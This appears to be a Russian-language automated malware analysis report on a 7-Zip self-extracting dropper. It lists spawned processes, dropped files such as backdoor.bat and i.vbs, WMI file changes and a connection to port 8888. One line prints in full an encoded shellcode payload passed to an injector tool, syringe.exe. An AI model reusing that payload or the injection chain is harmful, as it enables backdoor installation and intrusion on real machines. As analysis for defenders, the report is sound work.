Техническая информация
- %TEMP%\7ZipSfx.000\syringe.exe -3 PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI9lyxniuPWps0u0oyIuTq8RqtlK62dpnkaB6lNkQBDTnkqb6HdO87aZevp1YoTqIPLlulSQSLVb6LEpkqHOfmwqkwm2l0brRwLKSbVplKRbWLs1jplKcp1houyPBT3zeQzpbplKW86xNk68Epwqn3M3WLBiLKTtLK31ZvP19op1iPLlJahOtM31iW6XkPaekDc3QmxxUkQmgTpuir0XlKV8a4EQ9C56nkTLPKnkBxWlVan3lKVdNkEQxPMYQTTdq4aKQK0apYCjsaioypF8soRzNk7bXklF3mQx03P25P5P0hqgac02aObtE8bl3Ga6UWYoKenXNpC1C0uPWYJdv460E8gYOpBKWpio8UF02pf0PPg0V03ppPBHizTOiOkPYoxUogqzdERHO0y8UhsVE85R7p5rmhnim6cZB0CfbwBHnyMuad3QyoiEK5o0t4DL9oBndHaexlRHxpX5nBcfIoZuqzs0RJWtRv1Gu84BHY8HcoYoIELKP60jw0Phc0Fpwps0661zS0e82xmtV3IukOHUlSF3CZs0rvv3F7U8S2xYJhCo9oIEVaKseyxFlEKFsEXliSAA
- <SYSTEM32>\cmd.exe /c ""%TEMP%\7ZipSfx.000\s.bat" "
- <SYSTEM32>\wbem\wmiadap.exe /R /T
- <SYSTEM32>\cmd.exe /c ""%TEMP%\7ZipSfx.000\backdoor.bat" "
- <SYSTEM32>\wscript.exe i.vbs s.bat
- %TEMP%\7ZipSfx.000\s.bat
- <SYSTEM32>\wbem\Performance\WmiApRpl_new.ini
- %TEMP%\7ZipSfx.000\syringe.exe
- %TEMP%\7ZipSfx.000\backdoor.bat
- %TEMP%\7ZipSfx.000\i.vbs
- %TEMP%\7ZipSfx.000\s.bat
- %TEMP%\7ZipSfx.000\syringe.exe
- %TEMP%\7ZipSfx.000\backdoor.bat
- %TEMP%\7ZipSfx.000\i.vbs
- <SYSTEM32>\wbem\Performance\WmiApRpl_new.ini в <SYSTEM32>\wbem\Performance\WmiApRpl.ini
- <SYSTEM32>\wbem\Performance\WmiApRpl_new.h в <SYSTEM32>\wbem\Performance\WmiApRpl.h
- '<IP-адрес в локальной сети>':8888
- ClassName: 'Shell_TrayWnd' WindowName: ''